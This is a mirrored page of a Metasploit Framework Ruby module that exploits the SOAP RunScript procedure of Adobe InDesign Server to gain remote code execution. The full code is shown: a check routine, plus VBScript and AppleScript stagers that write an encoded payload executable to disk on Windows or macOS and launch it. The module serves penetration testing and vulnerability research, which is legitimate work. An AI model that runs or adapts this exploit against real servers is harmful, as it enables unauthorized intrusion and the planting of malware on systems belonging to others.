Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Exploit::EXE
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',
17
'Description' => %q{
18
This module abuses the "RunScript" procedure provided by the SOAP interface of
19
Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).
20
21
The exploit drops the payload on the server and must be removed manually.
22
},
23
'Author' => [
24
'h0ng10', # Vulnerability discovery / Metasploit module
25
'juan vazquez' # MacOSX target
26
],
27
'License' => MSF_LICENSE,
28
'Platform' => %w{osx win},
29
'Privileged' => false,
30
'DisclosureDate' => '2012-11-11',
31
'References' => [
32
[ 'OSVDB', '87548'],
33
[ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]
34
],
35
'Targets' => [
36
[
37
'Indesign CS6 Server / Windows (64 bits)',
38
{
39
'Arch' => ARCH_X64,
40
'Platform' => 'win'
41
}
42
],
43
[
44
'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',
45
{
46
'Arch' => ARCH_X64,
47
'Platform' => 'osx'
48
}
49
]
50
],
51
'DefaultTarget' => 0,
52
'Notes' => {
53
'Reliability' => UNKNOWN_RELIABILITY,
54
'Stability' => UNKNOWN_STABILITY,
55
'SideEffects' => UNKNOWN_SIDE_EFFECTS
56
}
57
)
58
)
59
60
register_options([ Opt::RPORT(12345) ])
61
end
62
63
def send_soap_request(script_code, script_type)
64
script_code.gsub!(/&/, '&amp;')
65
soap_xml = %Q{
66
<?xml version="1.0" encoding="UTF-8"?>
67
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
68
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
69
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
70
<SOAP-ENV:Body>
71
<IDSP:RunScript>
72
<IDSP:runScriptParameters>
73
<IDSP:scriptText>#{script_code}</IDSP:scriptText>
74
<IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>
75
</IDSP:runScriptParameters>
76
</IDSP:RunScript>
77
</SOAP-ENV:Body>
78
</SOAP-ENV:Envelope>
79
}
80
81
res = send_request_cgi({
82
'uri' => '/',
83
'method' => 'POST',
84
'content-type' => 'application/x-www-form-urlencoded',
85
'data' => soap_xml,
86
}, 5)
87
end
88
89
def check()
90
# Use a very simple javascript
91
check_var = rand_text_numeric(10)
92
checkscript = 'returnValue = "' + check_var + '"'
93
94
res = send_soap_request(checkscript, "javascript")
95
96
return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')
97
98
return Exploit::CheckCode::Safe
99
end
100
101
def exploit
102
if target.name =~ /Windows/
103
print_status("Creating payload vbs script")
104
encoded_payload = generate_payload_exe().unpack("H*").join
105
exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"
106
wsf = Rex::Text.rand_text_alpha(8)
107
payload_var = Rex::Text.rand_text_alpha(8)
108
exe_name_var = Rex::Text.rand_text_alpha(8)
109
file_var = Rex::Text.rand_text_alpha(8)
110
byte_var = Rex::Text.rand_text_alpha(8)
111
shell_var = Rex::Text.rand_text_alpha(8)
112
113
# This one creates a smaller vbs payload (without deletion)
114
vbs = %Q{
115
Set #{wsf} = CreateObject("Scripting.FileSystemObject")
116
#{payload_var} = "#{encoded_payload}"
117
#{exe_name_var} = #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"
118
Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)
119
For x = 1 To Len(#{payload_var})-3 Step 2
120
#{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)
121
#{file_var}.write Chr(#{byte_var})
122
Next
123
124
#{file_var}.write Chr(#{byte_var})
125
#{file_var}.close
126
127
Set #{shell_var} = CreateObject("Wscript.Shell")
128
#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False
129
Set #{shell_var} = Nothing
130
returnValue = #{exe_name_var}
131
}
132
# vbs = Msf::Util::EXE.to_exe_vbs(exe)
133
print_status("Sending SOAP request")
134
135
res = send_soap_request(vbs, "visual basic")
136
if res != nil and res.body != nil then
137
file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
138
print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"
139
end
140
141
elsif target.name =~ /Mac OS X/
142
143
print_status("Creating payload apple script")
144
145
exe_payload = generate_payload_exe
146
b64_exe_payload = Rex::Text.encode_base64(exe_payload)
147
b64_payload_name = rand_text_alpha(rand(5) + 5)
148
payload_name = rand_text_alpha(rand(5) + 5)
149
150
apple_script = %Q{
151
set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission
152
write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp
153
close access fp
154
do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"
155
do shell script "rm /tmp/#{b64_payload_name}.txt"
156
do shell script "chmod +x /tmp/#{payload_name}"
157
do shell script "/tmp/#{payload_name}"
158
set returnValue to "/tmp/#{payload_name}"
159
}
160
161
print_status("Sending SOAP request")
162
163
res = send_soap_request(apple_script, "applescript")
164
165
if res != nil and res.body != nil then
166
file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]
167
file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?
168
print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"
169
elsif not res
170
print_status "No response, it's expected"
171
print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"
172
end
173
174
end
175
end
176
end
177
178